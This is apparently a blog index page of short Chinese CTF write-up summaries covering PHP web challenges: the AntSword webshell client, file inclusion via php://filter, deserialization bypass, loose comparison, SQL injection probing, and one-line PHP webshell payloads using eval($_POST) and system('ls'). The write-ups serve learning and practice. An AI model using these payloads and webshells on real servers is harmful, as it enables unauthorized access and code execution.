摘要: ..老师发的菜刀拓展太隔手了...换蚁剑了 下载加载器 https://github.com/AntSwordProject/AntSword-Loader 下载文件 https://github.com/AntSwordProject/antSword 不过这个下载网速是真的费工夫,试了改host 阅读全文
posted @ 2019-11-16 00:40 Zhu013 阅读(2624) 评论(0) 推荐(0) 编辑
摘要: Web_php_wrong_nginx_config writeup Zhu013 未经允许请勿转载 1.进入页面发现需要登陆 2.robots.txt 发现hint.php Hack.php hint.php提示 配置文件也许有问题呀:/etc/nginx/sites-enabled/site.c 阅读全文
posted @ 2019-09-30 00:26 Zhu013 阅读(1697) 评论(0) 推荐(0) 编辑
摘要: 根据题总结 源自一道ctf题 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 对序列化反序列化进行了理解。 serialize()是序列化函数,它可以保存一个的所 阅读全文
posted @ 2019-09-26 18:48 Zhu013 阅读(688) 评论(0) 推荐(0) 编辑
摘要: 源自一道CTF题,理解全部写在注释里面 阅读全文
posted @ 2019-09-25 22:15 Zhu013 阅读(895) 评论(0) 推荐(0) 编辑
摘要: <?php 'a'==0 // true '12a'==12 //true '1'==1 //true '1aaaa55sss66'==1 //true 1==true==“1” 更多参考https://www.cnblogs.com/wh4am1/p/6687199.html 阅读全文
posted @ 2019-09-21 13:36 Zhu013 阅读(144) 评论(0) 推荐(0) 编辑
摘要: 访问,由于提示说是后台,所以访问index.php/my-webshell(路径任意) 发现是文件包含页面 http://111.198.29.45:42305/index.php/dsf?page=php://filter/read=convert.base64-encode/resource=i 阅读全文
posted @ 2019-09-20 00:59 Zhu013 阅读(245) 评论(0) 推荐(0) 编辑
摘要: 攻防世界 Web_php_include write updirbuster 扫目录 发现phpinfo()可以看到绝对路径 和 phpmyadmin进入phpmyadmin页面 root直接空密码登录查看phpmyadmin变量 secure file priv 值为空 说明可以写入一句话load 阅读全文
posted @ 2019-09-19 16:13 Zhu013 阅读(1499) 评论(3) 推荐(0) 编辑
摘要: #攻防世界 web2 write up minwen='a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws' #使用php函数从外到内 #str_rot123() #strrev() #base64decode() #观察这个fo 阅读全文
posted @ 2019-09-17 14:29 Zhu013 阅读(791) 评论(0) 推荐(0) 编辑
摘要: 进入页面 先输入1 和 1 发现 提示 用户名错误 猜测输入用户名 admin 和 1 提示 密码错误 继续猜测输入用户名 admin' 和1 提示 用户名错误 继续猜测输入 用户名 admin'#和1 提示 密码错误 说明 逻辑是先检查用户名是否正确再匹配密码,当页面出现密码错误时,说明用户名内容 阅读全文
posted @ 2019-09-10 22:57 Zhu013 阅读(328) 评论(0) 推荐(0) 编辑
摘要: 显示 目录 <script language=php>system("ls")</script> 一句话 <script language=php>echo 'a'; eval($_POST['flag']);</script> <script language="php">eval($_POST[ 阅读全文
posted @ 2019-09-09 23:28 Zhu013 阅读(178) 评论(0) 推荐(0) 编辑